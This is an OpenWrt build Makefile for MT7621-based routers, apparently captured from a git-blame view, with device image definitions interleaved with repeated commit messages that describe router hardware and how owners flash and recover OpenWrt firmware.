DEVICE_VENDOR := ELECOM
DEVICE_MODEL := WRC-1900GST
IMAGES += factory.bin
IMAGE/factory.bin := $$(sysupgrade_bin) | check-size | \
elecom-gst-factory WRC-1900GST 0.00
DEVICE_PACKAGES := kmod-mt7615e kmod-mt7615-firmware wpad-basic
endef
TARGET_DEVICES += elecom_wrc-1900gst
define Device/elecom_wrc-2533gst
$(Device/uimage-lzma-loader)
IMAGE_SIZE := 11264k
DEVICE_VENDOR := ELECOM
DEVICE_MODEL := WRC-2533GST
IMAGES += factory.bin
IMAGE/factory.bin := $$(sysupgrade_bin) | check-size | \
elecom-gst-factory WRC-2533GST 0.00
DEVICE_PACKAGES := kmod-mt7615e kmod-mt7615-firmware wpad-basic
endef
TARGET_DEVICES += elecom_wrc-2533gst
define Device/elecom_wrc-2533gst2
$(Device/uimage-lzma-loader)
IMAGE_SIZE := 24576k
DEVICE_VENDOR := ELECOM
DEVICE_MODEL := WRC-2533GST2
IMAGES += factory.bin
IMAGE/factory.bin := $$(sysupgrade_bin) | check-size | \
elecom-gst-factory WRC-2533GST2 0.00
DEVICE_PACKAGES := kmod-mt7615e kmod-mt7615-firmware wpad-basic
endef
TARGET_DEVICES += elecom_wrc-2533gst2
define Device/firefly_firewrt
IMAGE_SIZE := 16064k
DEVICE_VENDOR := Firefly
DEVICE_MODEL := FireWRT
DEVICE_PACKAGES := kmod-mt76x2 kmod-usb3 kmod-usb-ledtrig-usbport wpad-basic
SUPPORTED_DEVICES += firewrt
endef
TARGET_DEVICES += firefly_firewrt
define Device/gehua_ghl-r-001
IMAGE_SIZE := 32448k
DEVICE_VENDOR := GeHua
DEVICE_MODEL := GHL-R-001
DEVICE_PACKAGES := kmod-mt7603 kmod-mt76x2 kmod-usb3 \
kmod-usb-ledtrig-usbport wpad-basic
endef
TARGET_DEVICES += gehua_ghl-r-001
define Device/gnubee_gb-pc1
DEVICE_VENDOR := GnuBee
DEVICE_MODEL := Personal Cloud One
DEVICE_PACKAGES := kmod-ata-ahci kmod-usb3 kmod-sdhci-mt7620
IMAGE_SIZE := 32448k
endef
TARGET_DEVICES += gnubee_gb-pc1
define Device/gnubee_gb-pc2
DEVICE_VENDOR := GnuBee
DEVICE_MODEL := Personal Cloud Two
DEVICE_PACKAGES := kmod-ata-ahci kmod-usb3 kmod-sdhci-mt7620
IMAGE_SIZE := 32448k
endef
TARGET_DEVICES += gnubee_gb-pc2
define Device/hiwifi_hc5962
BLOCKSIZE := 128k
PAGESIZE := 2048
KERNEL_SIZE := 4096k
UBINIZE_OPTS := -E 5
ramips/mt7621: fix IMAGE_SIZE for all devices This fixes IMAGE_SIZE for all devices based on the partition size given in DTS: DEVICE *.MK *.DTS VERDICT afoundry_ew1200 (16M) 0xfb0000 asiarf_ap7621-001 (16M) 0xfa0000 wrong buffalo_wsr-1166dhp (16M) 0xf90000 wrong buffalo_wsr-600dhp (16M) 0xfb0000 dlink_dir-860l-b1 (16M) 0xfb0000 d-team_newifi-d2 (32M) 0x1fb0000 d-team_pbr-m1 (16M) 0xfb0000 elecom_wrc-1167ghbk2-s 15488k 0xf20000 elecom_wrc-1900gst 11264k 0xb00000 elecom_wrc-2533gst 11264k 0xb00000 firefly_firewrt (16M) 0xfb0000 gehua_ghl-r-001 (32M) 0x1fb0000 gnubee_gb-pc1 (32M) 0x1fb0000 gnubee_gb-pc2 (32M) 0x1fb0000 hiwifi_hc5962 (32M) 0x2000000 wrong (kernel + ubi) iodata_wn-ax1167gr 15552k 0xf30000 iodata_wn-gx300gr 7798784 0x770000 lenovo_newifi-d1 (32M) 0x1fb0000 linksys_re6500 - 0x7b0000 default mediatek_ap-mt7621a-v60 (8M) 0x7b0000 mediatek_mt7621-eval-board (4M) 0xec0000 wrong (rootfs) mikrotik_rb750gr3 [16128k] 0xfc0000 mikrotik_rbm11g [16128k] 0xFC0000 mikrotik_rbm33g [16128k] 0xFC0000 mqmaker_witi-256m (16M) 0xfb0000 mqmaker_witi-512m (16M) 0xfb0000 mtc_wr1201 16000k 0xfa0000 netgear_ex6150 14848k 0xe80000 netgear_r6220 28672k 0x1c00000 netgear_r6350 40960k 0x2800000 netgear_wndr3700-v5 15232k 0xee0000 netis_wf-2881 129280k 0x7E40000 phicomm_k2p 15744k 0xf60000 planex_vr500 66453504 0x3fb0000 wrong samknows_whitebox-v8 (16M) 0xfb0000 storylink_sap-g3200u3 - 0x7b0000 default telco-electronics_x1 16064k 0xfb0000 thunder_timecloud - 0xfb0000 wrong totolink_a7000r 16064k 0xfb0000 tplink_re350-v1 6016k 0x5e0000 ubiquiti_edgerouterx - 0xfa00000 wrong (kernel1 + ubi) ubiquiti_edgerouterx-sfp - 0xfa00000 wrong (kernel1 + ubi) unielec_u7621-06-256m-16m 16064k 0xfb0000 unielec_u7621-06-512m-64m 65216k 0x3fb0000 wevo_11acnas (16M) 0xfb0000 wevo_w2914ns-v2 (16M) 0xfb0000 xiaomi_mir3g 32768k 0x7980000 wrong (kernel + ubi) xiaomi_mir3p (32M) 0xf980000 wrong (kernel + ubi) xzwifi_creativebox-v1 (32M) 0x1fb0000 youhua_wr1200js 16064k 0xfb0000 youku_yk-l2 (16M) 0xfb0000 zbtlink_zbt-we1326 (16M) 0xfb0000 zbtlink_zbt-we3526 (16M) 0xfb0000 zbtlink_zbt-wg2626 (16M) 0xfb0000 zbtlink_zbt-wg3526-16m (16M) 0xfb0000 zbtlink_zbt-wg3526-32m (32M) 0x1fb0000 No verdict means that the device is correctly set. Legend: ( ): Value is set via ralink_default_fw_size_xxM [ ]: Value is derived from parent definition - : Value is not set and derived from default definition Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
2019-07-15 12:55:24 +00:00
IMAGE_SIZE := 32768k
IMAGES += factory.bin
IMAGE/sysupgrade.bin := sysupgrade-tar | append-metadata
IMAGE/factory.bin := append-kernel | pad-to $$(KERNEL_SIZE) | append-ubi | \
check-size
DEVICE_VENDOR := HiWiFi
DEVICE_MODEL := HC5962
DEVICE_PACKAGES := kmod-mt7603 kmod-mt76x2 kmod-usb3 wpad-basic
endef
TARGET_DEVICES += hiwifi_hc5962
ramips: add support for I-O DATA WN-AX1167GR I-O DATA WN-AX1167GR is a 2.4/5 GHz band 11ac router, based on MediaTek MT7621A. Specification: - MT7621A (2-Cores, 4-Threads) - 64 MB of RAM (DDR2) - 16 MB of Flash (SPI) - 2T2R 2.4/5 GHz - 5x 10/100/1000 Mbps Ethernet - 2x LEDs, 4x keys (2x buttons, 1x slide switch) - UART header on PCB - Vcc, GND, TX, RX from ethernet port side - baudrate: 115200 bps (U-Boot, OpenWrt) Stock firmware: In the stock firmware, WN-AX1167GR has two os images each composed of Linux kernel and rootfs. These images are stored in "Kernel" and "app" partition of the following partitions, respectively. (excerpt from dmesg): MX25L12805D(c2 2018c220) (16384 Kbytes) mtd .name = raspi, .size = 0x01000000 (16M) .erasesize = 0x00010000 (64K) .numeraseregions = 0 Creating 10 MTD partitions on "raspi": 0x000000000000-0x000001000000 : "ALL" 0x000000000000-0x000000030000 : "Bootloader" 0x000000030000-0x000000040000 : "Config " 0x000000040000-0x000000050000 : "Factory" 0x000000050000-0x000000060000 : "iNIC_rf" 0x000000060000-0x0000007e0000 : "Kernel" 0x000000800000-0x000000f80000 : "app" 0x000000f90000-0x000000fa0000 : "Key" 0x000000fa0000-0x000000fb0000 : "backup" 0x000000fb0000-0x000001000000 : "storage" The flag for boot partition is stored in "Key" partition, and U-Boot reads this and determines the partition to boot. If the image that U-Boot first reads according to the flag is "Bad Magic Number", U-Boot then tries to boot from the other image. If the second image is correct, change the flag to the number corresponding to that image and boot from that image. (example): ## Booting image at bc800000 ... Bad Magic Number,FFFFFFFF Boot from KERNEL 1 !! ## Booting image at bc060000 ... Image Name: MIPS OpenWrt Linux-4.14.50 Image Type: MIPS Linux kernel Image (lzma compressed) Data Size: 1865917 Bytes = 1.8 MB Load Address: 80001000 Entry Point: 80001000 Verifying Checksum ... OK Uncompressing Kernel Image ... OK raspi_erase_write: offs:f90000, count:34 . . Done! Starting kernel ... Flash instruction using factory image: 1. Connect the computer to the LAN port of WN-AX1167GR 2. Connect power cable to WN-AX1167GR and turn on it 3. Access to "192.168.0.1" on the web browser and open firmware update page ("ファームウェア") 4. Select the OpenWrt factory image and perform firmware update 5. On the initramfs image, execute "mtd erase firmware" to erase stock firmware and execute sysupgrade with sysupgrade image for WN-AX1167GR 6. Wait ~180 seconds to complete flasing Signed-off-by: INAGAKI Hiroshi <musashino.open@gmail.com>
2018-06-27 13:47:13 +00:00
define Device/iodata_wn-ax1167gr
$(Device/uimage-lzma-loader)
ramips: add support for I-O DATA WN-AX1167GR I-O DATA WN-AX1167GR is a 2.4/5 GHz band 11ac router, based on MediaTek MT7621A. Specification: - MT7621A (2-Cores, 4-Threads) - 64 MB of RAM (DDR2) - 16 MB of Flash (SPI) - 2T2R 2.4/5 GHz - 5x 10/100/1000 Mbps Ethernet - 2x LEDs, 4x keys (2x buttons, 1x slide switch) - UART header on PCB - Vcc, GND, TX, RX from ethernet port side - baudrate: 115200 bps (U-Boot, OpenWrt) Stock firmware: In the stock firmware, WN-AX1167GR has two os images each composed of Linux kernel and rootfs. These images are stored in "Kernel" and "app" partition of the following partitions, respectively. (excerpt from dmesg): MX25L12805D(c2 2018c220) (16384 Kbytes) mtd .name = raspi, .size = 0x01000000 (16M) .erasesize = 0x00010000 (64K) .numeraseregions = 0 Creating 10 MTD partitions on "raspi": 0x000000000000-0x000001000000 : "ALL" 0x000000000000-0x000000030000 : "Bootloader" 0x000000030000-0x000000040000 : "Config " 0x000000040000-0x000000050000 : "Factory" 0x000000050000-0x000000060000 : "iNIC_rf" 0x000000060000-0x0000007e0000 : "Kernel" 0x000000800000-0x000000f80000 : "app" 0x000000f90000-0x000000fa0000 : "Key" 0x000000fa0000-0x000000fb0000 : "backup" 0x000000fb0000-0x000001000000 : "storage" The flag for boot partition is stored in "Key" partition, and U-Boot reads this and determines the partition to boot. If the image that U-Boot first reads according to the flag is "Bad Magic Number", U-Boot then tries to boot from the other image. If the second image is correct, change the flag to the number corresponding to that image and boot from that image. (example): ## Booting image at bc800000 ... Bad Magic Number,FFFFFFFF Boot from KERNEL 1 !! ## Booting image at bc060000 ... Image Name: MIPS OpenWrt Linux-4.14.50 Image Type: MIPS Linux kernel Image (lzma compressed) Data Size: 1865917 Bytes = 1.8 MB Load Address: 80001000 Entry Point: 80001000 Verifying Checksum ... OK Uncompressing Kernel Image ... OK raspi_erase_write: offs:f90000, count:34 . . Done! Starting kernel ... Flash instruction using factory image: 1. Connect the computer to the LAN port of WN-AX1167GR 2. Connect power cable to WN-AX1167GR and turn on it 3. Access to "192.168.0.1" on the web browser and open firmware update page ("ファームウェア") 4. Select the OpenWrt factory image and perform firmware update 5. On the initramfs image, execute "mtd erase firmware" to erase stock firmware and execute sysupgrade with sysupgrade image for WN-AX1167GR 6. Wait ~180 seconds to complete flasing Signed-off-by: INAGAKI Hiroshi <musashino.open@gmail.com>
2018-06-27 13:47:13 +00:00
IMAGE_SIZE := 15552k
KERNEL_INITRAMFS := $$(KERNEL) | \
iodata-factory 7864320 4 0x1055 $(KDIR)/tmp/$$(KERNEL_INITRAMFS_PREFIX)-factory.bin
DEVICE_VENDOR := I-O DATA
DEVICE_MODEL := WN-AX1167GR
DEVICE_PACKAGES := kmod-mt7603 kmod-mt76x2 wpad-basic
ramips: add support for I-O DATA WN-AX1167GR I-O DATA WN-AX1167GR is a 2.4/5 GHz band 11ac router, based on MediaTek MT7621A. Specification: - MT7621A (2-Cores, 4-Threads) - 64 MB of RAM (DDR2) - 16 MB of Flash (SPI) - 2T2R 2.4/5 GHz - 5x 10/100/1000 Mbps Ethernet - 2x LEDs, 4x keys (2x buttons, 1x slide switch) - UART header on PCB - Vcc, GND, TX, RX from ethernet port side - baudrate: 115200 bps (U-Boot, OpenWrt) Stock firmware: In the stock firmware, WN-AX1167GR has two os images each composed of Linux kernel and rootfs. These images are stored in "Kernel" and "app" partition of the following partitions, respectively. (excerpt from dmesg): MX25L12805D(c2 2018c220) (16384 Kbytes) mtd .name = raspi, .size = 0x01000000 (16M) .erasesize = 0x00010000 (64K) .numeraseregions = 0 Creating 10 MTD partitions on "raspi": 0x000000000000-0x000001000000 : "ALL" 0x000000000000-0x000000030000 : "Bootloader" 0x000000030000-0x000000040000 : "Config " 0x000000040000-0x000000050000 : "Factory" 0x000000050000-0x000000060000 : "iNIC_rf" 0x000000060000-0x0000007e0000 : "Kernel" 0x000000800000-0x000000f80000 : "app" 0x000000f90000-0x000000fa0000 : "Key" 0x000000fa0000-0x000000fb0000 : "backup" 0x000000fb0000-0x000001000000 : "storage" The flag for boot partition is stored in "Key" partition, and U-Boot reads this and determines the partition to boot. If the image that U-Boot first reads according to the flag is "Bad Magic Number", U-Boot then tries to boot from the other image. If the second image is correct, change the flag to the number corresponding to that image and boot from that image. (example): ## Booting image at bc800000 ... Bad Magic Number,FFFFFFFF Boot from KERNEL 1 !! ## Booting image at bc060000 ... Image Name: MIPS OpenWrt Linux-4.14.50 Image Type: MIPS Linux kernel Image (lzma compressed) Data Size: 1865917 Bytes = 1.8 MB Load Address: 80001000 Entry Point: 80001000 Verifying Checksum ... OK Uncompressing Kernel Image ... OK raspi_erase_write: offs:f90000, count:34 . . Done! Starting kernel ... Flash instruction using factory image: 1. Connect the computer to the LAN port of WN-AX1167GR 2. Connect power cable to WN-AX1167GR and turn on it 3. Access to "192.168.0.1" on the web browser and open firmware update page ("ファームウェア") 4. Select the OpenWrt factory image and perform firmware update 5. On the initramfs image, execute "mtd erase firmware" to erase stock firmware and execute sysupgrade with sysupgrade image for WN-AX1167GR 6. Wait ~180 seconds to complete flasing Signed-off-by: INAGAKI Hiroshi <musashino.open@gmail.com>
2018-06-27 13:47:13 +00:00
endef
TARGET_DEVICES += iodata_wn-ax1167gr
define Device/iodata_nand
DEVICE_VENDOR := I-O DATA
2019-08-26 11:27:22 +00:00
BLOCKSIZE := 128k
PAGESIZE := 2048
UBINIZE_OPTS := -E 5
KERNEL_SIZE := 4096k
IMAGE_SIZE := 51200k
LOADER_TYPE := bin
KERNEL := kernel-bin | append-dtb | lzma | loader-kernel | lzma | uImage lzma
IMAGE/sysupgrade.bin := sysupgrade-tar | append-metadata
endef
define Device/iodata_wn-ax1167gr2
$(Device/iodata_nand)
UIMAGE_MAGIC := 0x434f4d42
DEVICE_MODEL := WN-AX1167GR2
KERNEL_INITRAMFS := $(KERNEL_DTB) | loader-kernel | lzma | \
custom-initramfs-uimage 3.10(XBC.1)b10 | iodata-mstc-header
DEVICE_PACKAGES := kmod-mt7615e kmod-mt7615-firmware wpad-basic
2019-08-26 11:27:22 +00:00
endef
TARGET_DEVICES += iodata_wn-ax1167gr2
ramips: add support for I-O DATA WN-AX2033GR I-O DATA WN-AX2033GR is roughly the same as I-O DATA WN-AX1167GR2. The difference is Wi-Fi feature. Specification ============= - SoC: MediaTek MT7621A - RAM: DDR3 128 MiB - Flash Memory: NAND 128 MiB (Spansion S34ML01G200TF100) - Wi-Fi: MediaTek MT7603E - Wi-Fi: MediaTek MT7615 - Ethernet: 5x 10 Mbps / 100 Mbps / 1000 Mbps (1x WAN, 4x LAN) - LED: 2x green LED - Input: 2x tactile switch, 1x slide switch - Serial console: 57600bps, PCB through hole J5 (Vcc, TX, RX, NC, GND) - Power: DC 12V This device only supports channel 1-13 and 36-140. Thus, narrower frequency limits compared to other devices are required for limiting wi-fi frequency correctly. Without this, non-supported frequencies are activated. Flash instructions ================== 1. Open the router management page (192.168.0.1). 2. Update router firmware using "initramfs-kernel.bin". 3. After updating, run sysupgrade with "sysupgrade.bin". Recovery instructions ===================== WN-AX2033GR contains Zyxel Z-LOADER 1. Setup TFTP server (IP address: 10.10.10.3). 2. Put official firmware into TFTP server directory (distribution site: https://www.iodata.jp/lib/software/w/2068.htm) 3. Connect WX-AX2033GR Ethernet port and computer that runs TFTP server. 4. Connect to serial console. 5. Interrupt booting by Esc key. 6. Flash firmware using "ATNR 1,[firmware filename]" command. Signed-off-by: Yanase Yuki <dev@zpc.sakura.ne.jp> [adjust for kernel 5.4, add recovery instructions/frequency comment] Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
2020-02-06 03:00:47 +00:00
define Device/iodata_wn-ax2033gr
$(Device/iodata_nand)
ramips: add support for I-O DATA WN-AX2033GR I-O DATA WN-AX2033GR is roughly the same as I-O DATA WN-AX1167GR2. The difference is Wi-Fi feature. Specification ============= - SoC: MediaTek MT7621A - RAM: DDR3 128 MiB - Flash Memory: NAND 128 MiB (Spansion S34ML01G200TF100) - Wi-Fi: MediaTek MT7603E - Wi-Fi: MediaTek MT7615 - Ethernet: 5x 10 Mbps / 100 Mbps / 1000 Mbps (1x WAN, 4x LAN) - LED: 2x green LED - Input: 2x tactile switch, 1x slide switch - Serial console: 57600bps, PCB through hole J5 (Vcc, TX, RX, NC, GND) - Power: DC 12V This device only supports channel 1-13 and 36-140. Thus, narrower frequency limits compared to other devices are required for limiting wi-fi frequency correctly. Without this, non-supported frequencies are activated. Flash instructions ================== 1. Open the router management page (192.168.0.1). 2. Update router firmware using "initramfs-kernel.bin". 3. After updating, run sysupgrade with "sysupgrade.bin". Recovery instructions ===================== WN-AX2033GR contains Zyxel Z-LOADER 1. Setup TFTP server (IP address: 10.10.10.3). 2. Put official firmware into TFTP server directory (distribution site: https://www.iodata.jp/lib/software/w/2068.htm) 3. Connect WX-AX2033GR Ethernet port and computer that runs TFTP server. 4. Connect to serial console. 5. Interrupt booting by Esc key. 6. Flash firmware using "ATNR 1,[firmware filename]" command. Signed-off-by: Yanase Yuki <dev@zpc.sakura.ne.jp> [adjust for kernel 5.4, add recovery instructions/frequency comment] Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
2020-02-06 03:00:47 +00:00
UIMAGE_MAGIC := 0x434f4d42
DEVICE_MODEL := WN-AX2033GR
KERNEL_INITRAMFS := $(KERNEL_DTB) | loader-kernel | lzma | \
custom-initramfs-uimage 3.10(VST.1)C10 | iodata-mstc-header
DEVICE_PACKAGES := kmod-mt7603 kmod-mt7615e kmod-mt7615-firmware wpad-basic
ramips: add support for I-O DATA WN-AX2033GR I-O DATA WN-AX2033GR is roughly the same as I-O DATA WN-AX1167GR2. The difference is Wi-Fi feature. Specification ============= - SoC: MediaTek MT7621A - RAM: DDR3 128 MiB - Flash Memory: NAND 128 MiB (Spansion S34ML01G200TF100) - Wi-Fi: MediaTek MT7603E - Wi-Fi: MediaTek MT7615 - Ethernet: 5x 10 Mbps / 100 Mbps / 1000 Mbps (1x WAN, 4x LAN) - LED: 2x green LED - Input: 2x tactile switch, 1x slide switch - Serial console: 57600bps, PCB through hole J5 (Vcc, TX, RX, NC, GND) - Power: DC 12V This device only supports channel 1-13 and 36-140. Thus, narrower frequency limits compared to other devices are required for limiting wi-fi frequency correctly. Without this, non-supported frequencies are activated. Flash instructions ================== 1. Open the router management page (192.168.0.1). 2. Update router firmware using "initramfs-kernel.bin". 3. After updating, run sysupgrade with "sysupgrade.bin". Recovery instructions ===================== WN-AX2033GR contains Zyxel Z-LOADER 1. Setup TFTP server (IP address: 10.10.10.3). 2. Put official firmware into TFTP server directory (distribution site: https://www.iodata.jp/lib/software/w/2068.htm) 3. Connect WX-AX2033GR Ethernet port and computer that runs TFTP server. 4. Connect to serial console. 5. Interrupt booting by Esc key. 6. Flash firmware using "ATNR 1,[firmware filename]" command. Signed-off-by: Yanase Yuki <dev@zpc.sakura.ne.jp> [adjust for kernel 5.4, add recovery instructions/frequency comment] Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de>
2020-02-06 03:00:47 +00:00
endef
TARGET_DEVICES += iodata_wn-ax2033gr
2019-04-09 05:48:31 +00:00
define Device/iodata_wn-dx1167r
$(Device/iodata_nand)
2019-04-09 05:48:31 +00:00
UIMAGE_MAGIC := 0x434f4d43
DEVICE_MODEL := WN-DX1167R
KERNEL_INITRAMFS := $(KERNEL_DTB) | loader-kernel | lzma | \
custom-initramfs-uimage 3.10(XIK.1)b10 | iodata-mstc-header
DEVICE_PACKAGES := kmod-mt7615e kmod-mt7615-firmware wpad-basic
2019-04-09 05:48:31 +00:00
endef
TARGET_DEVICES += iodata_wn-dx1167r
define Device/iodata_wn-gx300gr
$(Device/uimage-lzma-loader)
IMAGE_SIZE := 7616k
DEVICE_VENDOR := I-O DATA
DEVICE_MODEL := WN-GX300GR
DEVICE_PACKAGES := kmod-mt7603 wpad-basic
endef
TARGET_DEVICES += iodata_wn-gx300gr
define Device/iodata_wnpr2600g
$(Device/uimage-lzma-loader)
DEVICE_VENDOR := I-O DATA
DEVICE_MODEL := WNPR2600G
IMAGE_SIZE := 13952k
IMAGES += factory.bin
IMAGE/factory.bin := $$(sysupgrade_bin) | check-size | \
elx-header 0104003a 8844A2D168B45A2D
DEVICE_PACKAGES := kmod-mt7615e kmod-mt7615-firmware wpad-basic
endef
TARGET_DEVICES += iodata_wnpr2600g
define Device/iptime_a6ns-m
IMAGE_SIZE := 16128k
UIMAGE_NAME := a6nm
DEVICE_VENDOR := ipTIME
DEVICE_MODEL := A6ns-M
DEVICE_PACKAGES := kmod-mt7615e kmod-mt7615-firmware kmod-usb3 kmod-usb-ledtrig-usbport wpad-basic
endef
TARGET_DEVICES += iptime_a6ns-m
define Device/iptime_a8004t
IMAGE_SIZE := 16128k
UIMAGE_NAME := a8004t
DEVICE_VENDOR := ipTIME
DEVICE_MODEL := A8004T
DEVICE_PACKAGES := kmod-mt7615e kmod-mt7615-firmware kmod-usb3 wpad-basic
endef
TARGET_DEVICES += iptime_a8004t
define Device/jcg_jhr-ac876m
IMAGE_SIZE := 16064k
IMAGES += factory.bin
IMAGE/factory.bin := $$(sysupgrade_bin) | check-size | jcg-header 89.1
JCG_MAXSIZE := 16064k
DEVICE_VENDOR := JCG
DEVICE_MODEL := JHR-AC876M
DEVICE_PACKAGES := kmod-mt7615e kmod-mt7615-firmware kmod-usb3 kmod-usb-ledtrig-usbport wpad-basic
endef
TARGET_DEVICES += jcg_jhr-ac876m
define Device/lenovo_newifi-d1
$(Device/uimage-lzma-loader)
IMAGE_SIZE := 32448k
DEVICE_VENDOR := Newifi
DEVICE_MODEL := D1
DEVICE_PACKAGES := kmod-mt7603 kmod-mt76x2 kmod-usb3 kmod-sdhci-mt7620 \
kmod-usb-ledtrig-usbport wpad-basic
SUPPORTED_DEVICES += newifi-d1
endef
TARGET_DEVICES += lenovo_newifi-d1
ramips: add support for Linksys EA7500 v2 The Linksys EA7500 v2 is advertised as AC1900, but its internal hardware is AC2600 capable. Hardware -------- SoC: Mediatek MT7621AT (880 MHz, 2 cores 4 threads) RAM: 256M (Nanya NT5CC128M16IP-DI) FLASH: 128MB NAND (Macronix MX30LF1G18AC-TI) ETH: 5x 10/100/1000 Mbps Ethernet (MT7530) WIFI: - 2.4GHz: 1x MT7615N (4x4:4) - 5GHz: 1x MT7615N (4x4:4) - 4 antennas: 3 external detachable antennas and 1 internal USB: - 1x USB 3.0 - 1x USB 2.0 BTN: - 1x Reset button - 1x WPS button LEDS: - 1x White led (Power) - 6x Green leds (link lan1-lan4, link wan, wps) - 5x Orange leds (act lan1-lan4, act wan) (working but unmodifiable) Everything works correctly. Installation ------------ The “factory” openwrt image can be flashed directly from OEM stock firmware. After the flash the router will reboot automatically. However, due to the dual boot system, the first installation could fail (if you want to know why, read the footnotes). If the flash succeed and you can reach OpenWrt through the web interface or ssh, you are done. Otherwise the router will try to boot 3 times and then will automatically boot the OEM firmware (don’t turn off the router. Simply wait and try to reach the router through the web interface every now and then, it will take few minutes). After this, you should be back in the OEM firmware. Now you have to flash the OEM Firmware over itself using the OEM web interface (I tested it using the FW_EA7500v2_2.0.8.194281_prod.img downloaded from the Linksys website). When the router reboots flash the “factory” OpenWrt image and this time it should work. After the OpenWrt installation you have to use the sysupgrade image for future updates. Restore OEM Firmware -------------------- After the OpenWrt flash, the OEM firmware is still stored in the second partition thanks to the dual boot system. You can switch from OpenWrt to OEM firmware and vice-versa failing the boot 3 times in a row: 1) power on the router 2) wait 15 seconds 3) power off the router 4) repeat steps 1-2-3 twice more. 5) power on the router and you should be in the “other” firmware If you want to completely remove OpenWrt from your router, switch to the OEM firmware and then flash OEM firmware from the web interface as a normal update. This procedure will overwrite the OpenWrt partition. Footnotes --------- The Linksys EA7500-v2 has a dual boot system to avoid bricks. This system works using 2 pair of partitions: 1) "kernel" and "rootfs" 2) "alt_kernel" and "alt_rootfs". After 3 failed boot attempts, the bootloader tries to boot the other pair of partitions and so on. This system is managed by the bootloader, which writes a bootcount in the s_env partition, and if successfully booted, the system add a "zero-bootcount" after the previous value. A system update performed from OEM firmware, writes the firmware on the other pair of partitions and sets the bootloader to boot the new pair of partitions editing the “boot_part” variable in the bootloader vars. Effectively it's a quick and safe system to switch the selected boot partition. Another way to switch the boot partition is: 1) power on the router 2) wait 15 seconds 3) power off the router 4) repeat steps 1-2-3 twice more. 5) power on the router and you should be in the “other” firmware In this OpenWrt port, this dual boot system is partially working because the bootloader sets the right rootfs partition in the cmdline but unfortunately OpenWrt for ramips platform overwrites the cmdline so is not possible to detect the right rootfs partition. Because all of this, I preferred to simply use the first pair of partitions and set read-only the other pair. However this solution is not optimal because is not possible to know without opening the case which is the current booted partition. Let’s take for example a router booting the OEM firmware from the first pair of partitions. If we flash the OpenWrt image, it will be written on the second pair. In this situation the router will bootloop 3 times and then will automatically come back to the first pair of partitions containg the OEM firmware. In this situation, to flash OpenWrt correctly is necessary to switch the booting partition, flashing again the OEM firmware over itself. At this point the OEM firmware is on both pair of partitions but the current booted pair is the second one. Now, flashing the OpenWrt factory image will write the firmware on the first pair and then will boot correctly. If this limitation in the ramips platform about the cmdline will be fixed, the dual boot system can also be implemented in OpenWrt with almost no effort. Signed-off-by: Davide Fioravanti <pantanastyle@gmail.com> Co-Developed-by: Jackson Lim <jackcolentern@gmail.com> Signed-off-by: Jackson Lim <jackcolentern@gmail.com>
2020-05-11 23:27:50 +00:00
define Device/linksys_ea7500-v2
$(Device/uimage-lzma-loader)
BLOCKSIZE := 128k
PAGESIZE := 2048
KERNEL_SIZE := 4096k
IMAGE_SIZE := 36864k
DEVICE_VENDOR := Linksys
DEVICE_MODEL := EA7500
DEVICE_VARIANT := v2
DEVICE_PACKAGES := kmod-usb3 kmod-mt7615e kmod-mt7615-firmware wpad-basic uboot-envtools
ramips: add support for Linksys EA7500 v2 The Linksys EA7500 v2 is advertised as AC1900, but its internal hardware is AC2600 capable. Hardware -------- SoC: Mediatek MT7621AT (880 MHz, 2 cores 4 threads) RAM: 256M (Nanya NT5CC128M16IP-DI) FLASH: 128MB NAND (Macronix MX30LF1G18AC-TI) ETH: 5x 10/100/1000 Mbps Ethernet (MT7530) WIFI: - 2.4GHz: 1x MT7615N (4x4:4) - 5GHz: 1x MT7615N (4x4:4) - 4 antennas: 3 external detachable antennas and 1 internal USB: - 1x USB 3.0 - 1x USB 2.0 BTN: - 1x Reset button - 1x WPS button LEDS: - 1x White led (Power) - 6x Green leds (link lan1-lan4, link wan, wps) - 5x Orange leds (act lan1-lan4, act wan) (working but unmodifiable) Everything works correctly. Installation ------------ The “factory” openwrt image can be flashed directly from OEM stock firmware. After the flash the router will reboot automatically. However, due to the dual boot system, the first installation could fail (if you want to know why, read the footnotes). If the flash succeed and you can reach OpenWrt through the web interface or ssh, you are done. Otherwise the router will try to boot 3 times and then will automatically boot the OEM firmware (don’t turn off the router. Simply wait and try to reach the router through the web interface every now and then, it will take few minutes). After this, you should be back in the OEM firmware. Now you have to flash the OEM Firmware over itself using the OEM web interface (I tested it using the FW_EA7500v2_2.0.8.194281_prod.img downloaded from the Linksys website). When the router reboots flash the “factory” OpenWrt image and this time it should work. After the OpenWrt installation you have to use the sysupgrade image for future updates. Restore OEM Firmware -------------------- After the OpenWrt flash, the OEM firmware is still stored in the second partition thanks to the dual boot system. You can switch from OpenWrt to OEM firmware and vice-versa failing the boot 3 times in a row: 1) power on the router 2) wait 15 seconds 3) power off the router 4) repeat steps 1-2-3 twice more. 5) power on the router and you should be in the “other” firmware If you want to completely remove OpenWrt from your router, switch to the OEM firmware and then flash OEM firmware from the web interface as a normal update. This procedure will overwrite the OpenWrt partition. Footnotes --------- The Linksys EA7500-v2 has a dual boot system to avoid bricks. This system works using 2 pair of partitions: 1) "kernel" and "rootfs" 2) "alt_kernel" and "alt_rootfs". After 3 failed boot attempts, the bootloader tries to boot the other pair of partitions and so on. This system is managed by the bootloader, which writes a bootcount in the s_env partition, and if successfully booted, the system add a "zero-bootcount" after the previous value. A system update performed from OEM firmware, writes the firmware on the other pair of partitions and sets the bootloader to boot the new pair of partitions editing the “boot_part” variable in the bootloader vars. Effectively it's a quick and safe system to switch the selected boot partition. Another way to switch the boot partition is: 1) power on the router 2) wait 15 seconds 3) power off the router 4) repeat steps 1-2-3 twice more. 5) power on the router and you should be in the “other” firmware In this OpenWrt port, this dual boot system is partially working because the bootloader sets the right rootfs partition in the cmdline but unfortunately OpenWrt for ramips platform overwrites the cmdline so is not possible to detect the right rootfs partition. Because all of this, I preferred to simply use the first pair of partitions and set read-only the other pair. However this solution is not optimal because is not possible to know without opening the case which is the current booted partition. Let’s take for example a router booting the OEM firmware from the first pair of partitions. If we flash the OpenWrt image, it will be written on the second pair. In this situation the router will bootloop 3 times and then will automatically come back to the first pair of partitions containg the OEM firmware. In this situation, to flash OpenWrt correctly is necessary to switch the booting partition, flashing again the OEM firmware over itself. At this point the OEM firmware is on both pair of partitions but the current booted pair is the second one. Now, flashing the OpenWrt factory image will write the firmware on the first pair and then will boot correctly. If this limitation in the ramips platform about the cmdline will be fixed, the dual 